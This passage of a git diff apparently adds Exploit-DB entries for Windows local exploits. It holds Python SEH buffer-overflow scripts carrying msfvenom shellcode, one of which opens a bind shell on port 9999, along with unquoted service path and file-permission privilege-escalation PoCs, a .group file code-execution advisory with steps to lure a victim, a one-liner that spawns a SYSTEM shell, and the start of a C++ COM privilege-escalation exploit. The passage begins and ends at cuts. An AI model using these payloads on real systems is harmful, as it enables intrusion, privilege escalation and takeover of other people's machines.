+    shellcode += b"\x32\x03\xcb\xb4\xd3\x03\x28\x0c\xd5\x22\xff"
+    shellcode += b"\x06\x8c\xe4\xfe\xcb\xa4\xac\x18\x0f\x80\x67"
+    shellcode += b"\x93\xfb\x7e\x76\x75\x32\x7e\xd5\xb8\xfa\x8d"
+    shellcode += b"\x27\xfd\x3d\x6e\x52\xf7\x3d\x13\x65\xcc\x3c"
+    shellcode += b"\xcf\xe0\xd6\xe7\x84\x53\x32\x19\x48\x05\xb1"
+    shellcode += b"\x15\x25\x41\x9d\x39\xb8\x86\x96\x46\x31\x29"
+    shellcode += b"\x78\xcf\x01\x0e\x5c\x8b\xd2\x2f\xc5\x71\xb4"
+    shellcode += b"\x50\x15\xda\x69\xf5\x5e\xf7\x7e\x84\x3d\x90"
+    shellcode += b"\xb3\xa5\xbd\x60\xdc\xbe\xce\x52\x43\x15\x58"
+    shellcode += b"\xdf\x0c\xb3\x9f\x20\x27\x03\x0f\xdf\xc8\x74"
+    shellcode += b"\x06\x24\x9c\x24\x30\x8d\x9d\xae\xc0\x32\x48"
+    shellcode += b"\x5a\xc8\x95\x23\x79\x35\x65\x94\x3d\x95\x0e"
+    shellcode += b"\xfe\xb1\xca\x2f\x01\x18\x63\xc7\xfc\xa3\xac"
+    shellcode += b"\x17\x88\x42\xd8\x37\xdc\xdd\x74\xfa\x3b\xd6"
+    shellcode += b"\xe3\x05\x6e\x4e\x83\x4e\x78\x49\xac\x4e\xae"
+    shellcode += b"\xfd\x3a\xc5\xbd\x39\x5b\xda\xeb\x69\x0c\x4d"
+    shellcode += b"\x61\xf8\x7f\xef\x76\xd1\x17\x8c\xe5\xbe\xe7"
+    shellcode += b"\xdb\x15\x69\xb0\x8c\xe8\x60\x54\x21\x52\xdb"
+    shellcode += b"\x4a\xb8\x02\x24\xce\x67\xf7\xab\xcf\xea\x43"
+    shellcode += b"\x88\xdf\x32\x4b\x94\x8b\xea\x1a\x42\x65\x4d"
+    shellcode += b"\xf5\x24\xdf\x07\xaa\xee\xb7\xde\x80\x30\xc1"
+    shellcode += b"\xde\xcc\xc6\x2d\x6e\xb9\x9e\x52\x5f\x2d\x17"
+    shellcode += b"\x2b\xbd\xcd\xd8\xe6\x05\xfd\x92\xaa\x2c\x96"
+    shellcode += b"\x7a\x3f\x6d\xfb\x7c\xea\xb2\x02\xff\x1e\x4b"
+    shellcode += b"\xf1\x1f\x6b\x4e\xbd\xa7\x80\x22\xae\x4d\xa6"
+    shellcode += b"\x91\xcf\x47"
+    payload  = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode
+    # offsets: 0      260 264  268 272    304 308 312    316      324
+    f       = open(File, 'w') # open file for write
+    f.write(payload)
+    f.close() # close the file
+    print blt + File + " created successfully "
+#   root@kali# nc <Victim IP> 9999
+#   Microsoft Windows [Version 6.1.7601]
+#   C:\Program Files (x86)\AVS4YOU\AVSAudioConverter>
+except:
+    print err + File + ' failed to create'
\ No newline at end of file
diff --git a/exploits/windows/local/47812.py b/exploits/windows/local/47812.py
new file mode 100755
index 000000000..c9f2f0636
--- /dev/null
+++ b/exploits/windows/local/47812.py
@@ -0,0 +1,90 @@
+# Exploit Title: FTP Navigator 8.03 - Stack Overflow (SEH)
+# Date: December 28th, 2019
+# Exploit Author: boku
+# Discovered by: Chris Inzinga
+# Original DoS: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH) 
+# Original DoS Link: https://www.exploit-db.com/exploits/47794
+# Software Vendor: http://www.internet-soft.com/
+# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
+# Version: Version 8.03
+# Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64)
+# Recreate:
+
+#!/usr/bin/python
+#   1) Generate 'poc.txt' payload using python 2.7.x
+#   2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
+#   3) Install & Open FTP Navigator v8.03
+#   4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
+#      - A textbox will appear on the bottom of the right window
+#   5) Paste payload from generated txt file into textbox
+#   6) Click "Do it"
+#      - The program will crash & calculator will open
+blt = '\033[92m[\033[0m+\033[92m]\033[0m '           # bash green success bullet
+err = '\033[91m[\033[0m!\033[91m]\033[0m '           # bash red   error   bullet
+try:
+    nops      = '\x90'*400
+    # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
+    #x86/alpha_upper succeeded with size 447 (iteration=0)
+    shellcode =  b""
+    shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
+    shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
+    shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
+    shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
+    shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
+    shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
+    shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
+    shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
+    shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
+    shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
+    shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
+    shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
+    shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
+    shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
+    shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
+    shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
+    shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
+    shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
+    shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
+    shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
+    shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
+    shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
+    shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
+    shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
+    shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
+    shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
+    shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
+    shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
+    shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
+    shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
+    shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
+    shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
+    shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
+    shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
+    shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
+    shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
+    shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
+    shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
+    shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
+    shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
+    shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"
+    jmp2nops   = '\xe8\xff\xff\xff\xff' # call +4       // This call will land us at the last \xff of our call instruction
+    jmp2nops  += '\xc3'                 # ret/inc ebx   // Since EIP is at \xff after call, this will be interpruted as: \xff\xc3 =inc ebx (a nop instruction)
+    jmp2nops  += '\x59'                 # pop ecx       // Pop the memory location from the call instruction that was pushed onto the stack into the ECX register
+    jmp2nops  += '\x31\xd2'             # xor edx, edx  // Clear the EDX register. We are going to jump to the beginning of our buffer.
+    jmp2nops  += '\x66\x81\xca\xfc\x0f' # or dx, 4092   // EDX is now equal to 0x00000ffc
+    jmp2nops  += '\x66\x29\xd1'         # sub ex, dx    // We subtract 4092 bytes from our memory location in the ECX register.
+    jmp2nops  += '\xff\xe1'             # jmp ecx       // Now we jump back to the beginning of our buffer; into our NOP sled.
+    offset     = '\x41' * (4112-len(nops+shellcode+jmp2nops))
+    nSEH       = '\xeb\xeb\x90\x90'     # jmp short -22 (to jmp2nops)
+    # 0x00457576 [ftpnavi.exe] : pop edx # pop ebx # ret  
+    # | Rebase: False | ASLR: False | SafeSEH: False
+    # | (c:\FTP Navigator\ftpnavi.exe) | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ}
+    SEH        = '\x76\x75\x45'         # SEH 3 byte overwrite
+    payload    = nops+shellcode+offset+jmp2nops+nSEH+SEH
+    File       = 'poc.txt'
+    f          = open(File, 'w')  # open file for write
+    f.write(payload)
+    f.close()                     # close the file
+    print blt + File + " created successfully "
+except:
+    print err + File + ' failed to create'
\ No newline at end of file
diff --git a/exploits/windows/local/47818.txt b/exploits/windows/local/47818.txt
new file mode 100644
index 000000000..f253009f9
--- /dev/null
+++ b/exploits/windows/local/47818.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Wing FTP Server 6.0.7 - Unquoted Service Path
+# Date: 2019-12-30
+# Exploit Author: Nawaf Alkeraithe
+# Vendor Homepage: https://www.wftpserver.com/
+# Version: 6.0.7
+# Tested on: Windows 10
+# CVE : N/A
+
+# PoC:
+
+C:\Users\user>sc qc "Wing FTP Server"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Wing FTP Server
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Wing FTP
+Server\WFTPServer.exe service
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Wing FTP Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47825.py b/exploits/windows/local/47825.py
new file mode 100755
index 000000000..ff858ef3f
--- /dev/null
+++ b/exploits/windows/local/47825.py
@@ -0,0 +1,82 @@
+# Exploit Title: Domain Quester Pro 6.02 - Stack Overflow (SEH)
+# Date: 2019-12-26
+# Exploit Author: boku
+# Software Vendor: http://www.internet-soft.com/
+# Software Link: http://www.internet-soft.com/DEMO/questerprosetup.exe
+# Version: Version 6.02
+# Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64)
+# Recreate:
+#   1) Generate 'bind9999.txt' payload using python 2.7.x
+#   2) On target Windows machine, open the file 'bind9999.txt' with notepad, then Select-All & Copy
+#   3) Install & Open Domain Quester Pro 6.02
+#   4) Under 'Domain Name Keywords', click 'Add'
+#      - A textbox will appear
+#   5) Paste payload from generated txt file into textbox
+#   6) Click 'OK'
+#      - The program will freeze & a bind shell will be listening on tcp port 9999, on all interfaces
+
+#!/usr/bin/python
+
+File = 'bind9999.txt'
+try:
+    # SEH triggered by exception 'Access violation when reading [eax]'
+    # - Crash at Instruction: 00403AB8    8B10       mov edx, dword ptr ds:[eax]
+    # - EAX is overwritten by our overflow
+    # - SEH overwriten at 4116 bytes
+    # Bad Characters: '\x00\x02\x03\x04\x05\x06\x07\x08\x0a\x0c\x0d'
+    # - The above bytes truncate the buffer
+    nops     = '\x90'*400
+    # msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00\x02\x03\x04\x05\x06\x07\x08\x0a\x0c\x0d' --format python
+    #   x86/call4_dword_xor chosen with final size 352
+    shellcode =  b""
+    shellcode += b"\x2b\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0"
+    shellcode += b"\x5e\x81\x76\x0e\xa3\xda\x2f\x1f\x83\xee\xfc"
+    shellcode += b"\xe2\xf4\x5f\x32\xad\x1f\xa3\xda\x4f\x96\x46"
+    shellcode += b"\xeb\xef\x7b\x28\x8a\x1f\x94\xf1\xd6\xa4\x4d"
+    shellcode += b"\xb7\x51\x5d\x37\xac\x6d\x65\x39\x92\x25\x83"
+    shellcode += b"\x23\xc2\xa6\x2d\x33\x83\x1b\xe0\x12\xa2\x1d"
+    shellcode += b"\xcd\xed\xf1\x8d\xa4\x4d\xb3\x51\x65\x23\x28"
+    shellcode += b"\x96\x3e\x67\x40\x92\x2e\xce\xf2\x51\x76\x3f"
+    shellcode += b"\xa2\x09\xa4\x56\xbb\x39\x15\x56\x28\xee\xa4"
+    shellcode += b"\x1e\x75\xeb\xd0\xb3\x62\x15\x22\x1e\x64\xe2"
+    shellcode += b"\xcf\x6a\x55\xd9\x52\xe7\x98\xa7\x0b\x6a\x47"
+    shellcode += b"\x82\xa4\x47\x87\xdb\xfc\x79\x28\xd6\x64\x94"
+    shellcode += b"\xfb\xc6\x2e\xcc\x28\xde\xa4\x1e\x73\x53\x6b"
+    shellcode += b"\x3b\x87\x81\x74\x7e\xfa\x80\x7e\xe0\x43\x85"
+    shellcode += b"\x70\x45\x28\xc8\xc4\x92\xfe\xb2\x1c\x2d\xa3"
+    shellcode += b"\xda\x47\x68\xd0\xe8\x70\x4b\xcb\x96\x58\x39"
+    shellcode += b"\xa4\x25\xfa\xa7\x33\xdb\x2f\x1f\x8a\x1e\x7b"
+    shellcode += b"\x4f\xcb\xf3\xaf\x74\xa3\x25\xfa\x75\xab\x83"
+    shellcode += b"\x7f\xfd\x5e\x9a\x7f\x5f\xf3\xb2\xc5\x10\x7c"
+    shellcode += b"\x3a\xd0\xca\x34\xb2\x2d\x1f\x84\xd5\xa6\xf9"
+    shellcode += b"\xc9\xca\x79\x48\xcb\x18\xf4\x28\xc4\x25\xfa"
+    shellcode += b"\x48\xcb\x6d\xc6\x27\x5c\x25\xfa\x48\xcb\xae"
+    shellcode += b"\xc3\x24\x42\x25\xfa\x48\x34\xb2\x5a\x71\xee"
+    shellcode += b"\xbb\xd0\xca\xcb\xb9\x42\x7b\xa3\x53\xcc\x48"
+    shellcode += b"\xf4\x8d\x1e\xe9\xc9\xc8\x76\x49\x41\x27\x49"
+    shellcode += b"\xd8\xe7\xfe\x13\x1e\xa2\x57\x6b\x3b\xb3\x1c"
+    shellcode += b"\x2f\x5b\xf7\x8a\x79\x49\xf5\x9c\x79\x51\xf5"
+    shellcode += b"\x8c\x7c\x49\xcb\xa3\xe3\x20\x25\x25\xfa\x96"
+    shellcode += b"\x43\x94\x79\x59\x5c\xea\x47\x17\x24\xc7\x4f"
+    shellcode += b"\xe0\x76\x61\xdf\xaa\x01\x8c\x47\xb9\x36\x67"
+    shellcode += b"\xb2\xe0\x76\xe6\x29\x63\xa9\x5a\xd4\xff\xd6"
+    shellcode += b"\xdf\x94\x58\xb0\xa8\x40\x75\xa3\x89\xd0\xca"
+    jmp2nops   = '\xe8\xff\xff\xff\xff' # call +4       // This call will land us at the last \xff of our call instruction
+    jmp2nops  += '\xc3'                 # ret/inc ebx   // Since EIP is at \xff after call, this will be interpruted as \xff\xc3 (inc ebx)
+    jmp2nops  += '\x59'                 # pop ecx       // Pop the memory location from the call instruction that was pushed onto the stack into the ECX register
+    jmp2nops  += '\x31\xd2'             # xor edx, edx  // Clear the EDX register. We are going to jump to the beginning of our buffer.
+    jmp2nops  += '\x66\x81\xca\x04\x10' # or dx, 4090   // EDX is now equal to 0x00004100.
+    jmp2nops  += '\x66\x29\xd1'         # sub ex, dx    // We subtract 4100 bytes from our memory location in the ECX register.
+    jmp2nops  += '\xff\xe1'             # jmp ecx       // Now we jump back to the beginning of our buffer; into our NOP sled.
+    offset     = '\x41' * (4116-len(nops+shellcode+jmp2nops))
+    nSEH       = '\xeb\xeb\x90\x90'     # jmp short -22 (to jmp2nops)
+    # 0x00400000 [questpro.exe]         | Rebase: False | ASLR: False | SafeSEH: False 
+    # 0x0042666b [questpro.exe]         | pop ecx + pop ebp + ret  | {PAGE_EXECUTE_READ} 
+    SEH        = '\x6b\x66\x42'         # SEH 3 byte overwrite
+    payload    = nops+shellcode+offset+jmp2nops+nSEH+SEH
+    f          = open(File, 'w')
+    f.write(payload)
+    f.close()
+    print File + ' created successfully '
+except:
+    print File + ' failed to create'
\ No newline at end of file
diff --git a/exploits/windows/local/47831.txt b/exploits/windows/local/47831.txt
new file mode 100644
index 000000000..07e150643
--- /dev/null
+++ b/exploits/windows/local/47831.txt
@@ -0,0 +1,68 @@
+# Exploit Title: NextVPN v4.10 - Insecure File Permissions 
+# Date: 2019-12-23 
+# Exploit Author: SajjadBnd 
+# Contact: blackwolf@post.com 
+# Vendor Homepage: https://vm3max.site 
+# Software Link:http://dl.spacevm.com/NextVPNSetup-v4.10.exe 
+# Version: 4.10 
+# Tested on: Win10 Professional x64 
+
+[ Description ] 
+
+The NextVPN Application was installed with insecure file permissions. It was found that all folder and file permissions were incorrectly configured during installation. It was possible to replace the service binary. 
+
+[ PoC ]
+
+C:\Users\user\AppData\Local\NextVPN>icacls *.exe
+
+Helper64.exe NT AUTHORITY\SYSTEM:(F)
+             BUILTIN\Administrators:(F)
+             DESKTOP-5V14SL6\user:(F)
+ 
+NextVPN.exe NT AUTHORITY\SYSTEM:(F)
+            BUILTIN\Administrators:(F)
+            DESKTOP-5V14SL6\user:(F)
+ 
+Proxifier.exe NT AUTHORITY\SYSTEM:(F)
+              BUILTIN\Administrators:(F)
+              DESKTOP-5V14SL6\user:(F)
+ 
+ProxyChecker.exe NT AUTHORITY\SYSTEM:(F)
+                 BUILTIN\Administrators:(F)
+                 DESKTOP-5V14SL6\user:(F)
+ 
+Uninstall.exe NT AUTHORITY\SYSTEM:(F)
+              BUILTIN\Administrators:(F)
+              DESKTOP-5V14SL6\user:(F)
+ 
+Successfully processed 5 files; Failed processing 0 files
+and other Directories :
+
+>cd openconnect
+openconnect.exe NT AUTHORITY\SYSTEM:(F)
+                BUILTIN\Administrators:(F)
+                DESKTOP-5V14SL6\user:(F)
+Successfully processed 1 files; Failed processing 0 files
+ 
+ 
+>cd st
+ 
+st.exe NT AUTHORITY\SYSTEM:(F)
+       BUILTIN\Administrators:(F)
+       DESKTOP-5V14SL6\user:(F)
+Successfully processed 1 files; Failed processing 0 files
+ 
+>cd update
+
+update.exe NT AUTHORITY\SYSTEM:(F)
+           BUILTIN\Administrators:(F)
+           DESKTOP-5V14SL6\user:(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+[ Exploit -Privilege Escalation  ]
+
+ReplaceNextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable
+malicious  file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
+
+ 
\ No newline at end of file
diff --git a/exploits/windows/local/47838.txt b/exploits/windows/local/47838.txt
new file mode 100644
index 000000000..36557962a
--- /dev/null
+++ b/exploits/windows/local/47838.txt
@@ -0,0 +1,91 @@
+# Exploit Title: Microsoft Windows .Group File - Code Execution
+# Date: 2020-01-01
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.microsoft.com
+# Version: 1.9.6
+# Tested on: Windows
+# CVE : N/A
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt
+[+] twitter.com/hyp3rlinx
+[+] apparitionsec@gmail
+[+] ISR: Apparition Security
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows ".Group" File Type
+
+Gorup files are a collection of contacts created by Windows Contacts, an embedded contact management program included with Windows.
+It contains a list of contacts saved into a group; which can be used to create a mailing list for sending email
+messages to multiple addresses at once.
+
+
+[Vulnerability Type]
+URL Field Code Execution
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Windows ".group" files are related to Contact files and suffer from unexpected code execution when clicking the "Contact Group Details"
+tab Website Go button. This happens if the website URL field points to an executable file. This is the same type of vulnerability
+affecting Windows .contact files that remains unfixed as of the time of this writing and has a metasploit module available.
+
+[References]
+http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt
+
+Therefore, attacker supplied executables can run unexpected to the user, who thinks they visit a website when click the Website go button.
+Moreover, if files are compressed using certain archive utilities it may be possible to skirt security warnings even when the executable is
+internet downloaded or copied from network share.
+
+This exploit requires a bit more user interaction than the previously disclosed .contact file vulnerability, as the GROUP file will complain
+if not in the Contacts directory. Advisory released for the sake of completeness and user security awareness.
+
+
+[Exploit/POC]
+1) create a Windows .group file
+
+2) create a directory named "http"
+
+3) create an executable file with a .com ext (change .exe to .com) like www.microsoft.com an place it in the "http" dir alongside .group file.
+
+4) point the website URL to the executable using path traversal like "http.\www.microsoft.com" which is the website address in the .group file.
+
+Note: the directory traversal can also point to other dirs like  ..\Downloads\http.\microsoft.com but downside is the URL looks very sketchy.
+
+5) package it up in an archive .rar etc.
+
+6) send the .group file via email, or download it and lure the user to place the archive in the "c:\User\<victim>\Contacts" directory.
+
+7) open the archive and double click the .group file (Windows will complain with an error to move to the contacts folder
+   if not within that dir already) next click the website address go button.
+
+The attackers executable will run instead of navigating to a website as would be expected by an end user.
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: Same type vuln affecting .contact files disclosed January 16, 2019, status remains unfixed.
+January 1, 2020 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47845.txt b/exploits/windows/local/47845.txt
new file mode 100644
index 000000000..1afa2f8e5
--- /dev/null
+++ b/exploits/windows/local/47845.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Plantronics Hub 3.13.2 - Local Privilege Escalation
+# Date: 2020-01-2
+# Exploit Author: Markus Krell - @MarkusKrell
+# Vendor Homepage: https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf
+# Software Link: https://www.plantronics.com/content/dam/plantronics/software/PlantronicsHubInstaller-3.13.2.exe
+# Version: Plantronics Hub for Windows prior to version 3.14
+# Tested on: Windows 10 Enterprise
+# CVE : N/A
+
+As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory. The content of MajorUpgrade.config should look like the following one liner:
+<WINDOWS-USERNAME>|advertise|<FULL-PATH-TO-YOUR-DESIRED-PAYLOAD>
+
+Exchange <WINDOWS-USERNAME> with your local (non-administrative) username. Calling cmd.exe is the most basic exploitation, as it will spawn a system shell in your (unprivileged) windows session. 
+You may of course call any other binary you can plant on the machine.
+
+Steps for exploitation (PoC):
+- Open cmd.exe 
+- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
+- echo %username%^|advertise^|C:\Windows\System32\cmd.exe > MajorUpgrade.config
\ No newline at end of file
diff --git a/exploits/windows/local/47852.txt b/exploits/windows/local/47852.txt
new file mode 100644
index 000000000..16a30973f
--- /dev/null
+++ b/exploits/windows/local/47852.txt
@@ -0,0 +1,24 @@
+#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2020-01-05
+#Vendor Homepage : http://webcompanion.com/
+#Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2
+#Tested on OS: Windows 10
+
+
+#Analyze PoC :
+==============
+
+C:\Users\ZwX>sc qc WCAssistantService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: WCAssistantService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : WC Assistant
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47880.cc b/exploits/windows/local/47880.cc
new file mode 100644
index 000000000..f02ebcf47
--- /dev/null
+++ b/exploits/windows/local/47880.cc
@@ -0,0 +1,270 @@
+// Axel '0vercl0k' Souchet - December 28 2019
+// References:
+//  - Found by an anonymous researcher, written up by Simon '@HexKitchen' Zuckerbraun
+//    - https://www.zerodayinitiative.com/blog/2019/12/19/privilege-escalation-via-the-core-shell-com-registrar-object
+//  - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sserver/sserver.cpp
+//  - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sclient/sclient.cpp
+
+#include <windows.h>
+#include <cstdint>
+#include <atlbase.h>
+
+// 54E14197-88B0-442F-B9A3-86837061E2FB
+// .rdata:0000000000014108 CLSID_CoreShellComServerRegistrar dd 54E14197h  ; Data1
+// .rdata:0000000000014108   dw 88B0h                                      ; Data2
+// .rdata:0000000000014108   dw 442Fh                                      ; Data3
+// .rdata:0000000000014108   db 0B9h, 0A3h, 86h, 83h, 70h, 61h, 0E2h, 0FBh ; Data4
+const GUID CLSID_CoreShellComServerRegistrar = {
+    0x54e14197, 0x88b0, 0x442f, {
+        0xb9, 0xa3, 0x86, 0x83, 0x70, 0x61, 0xe2, 0xfb
+}};
+
+// 27EB33A5-77F9-4AFE-AE056-FDBBE720EE7
+// .rdata:00000000000140B8 GuidICOMServerRegistrar dd 27EB33A5h          ; Data1
+// .rdata:00000000000140B8   dw 77F9h                                    ; Data2
+// .rdata:00000000000140B8   dw 4AFEh                                    ; Data3
+// .rdata:00000000000140B8   db 0AEh, 5, 6Fh, 0DBh, 0BEh, 72h, 0Eh, 0E7h ; Data4
+MIDL_INTERFACE("27EB33A5-77F9-4AFE-AE05-6FDBBE720EE7")
+ICoreShellComServerRegistrar : public IUnknown {
+    // 0:015> dqs 00007ff8`3fe526e8
+    // [...]
+    // 00007ff8`3fe52730  00007ff8`3fe4a5e0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::QueryInterface
+    // 00007ff8`3fe52738  00007ff8`3fe4a6d0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::AddRef
+    // 00007ff8`3fe52740  00007ff8`3fe4a680 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::Release
+    // 00007ff8`3fe52748  00007ff8`3fe47260 CoreShellExtFramework!CoreShellComServerRegistrar::RegisterCOMServer
+    // 00007ff8`3fe52750  00007ff8`3fe476b0 CoreShellExtFramework!CoreShellComServerRegistrar::UnregisterCOMServer
+    // 00007ff8`3fe52758  00007ff8`3fe477f0 CoreShellExtFramework!CoreShellComServerRegistrar::DuplicateHandle
+    // 00007ff8`3fe52760  00007ff8`3fe47920 CoreShellExtFramework!CoreShellComServerRegistrar::OpenProcess
+    virtual HRESULT STDMETHODCALLTYPE RegisterCOMServer() = 0;
+    virtual HRESULT STDMETHODCALLTYPE UnregisterCOMServer() = 0;
+    virtual HRESULT STDMETHODCALLTYPE DuplicateHandle() = 0;
+    virtual HRESULT STDMETHODCALLTYPE OpenProcess(
+        const uint32_t DesiredAccess,
+        const bool InheritHandle,
+        const uint32_t ArbitraryPid,
+        const uint32_t TargetProcessId,
+        HANDLE *ProcessHandle
+    ) = 0;
+};
+
+struct Marshalled_t {
+    uint32_t Meow;
+    uint32_t ObjRefType;
+    GUID IfaceId;
+    uint32_t Flags;
+    uint32_t References;
+    uint64_t Oxid;
+    uint64_t Oid;
+    union {
+        uint64_t IfacePointerIdLow;
+        struct {
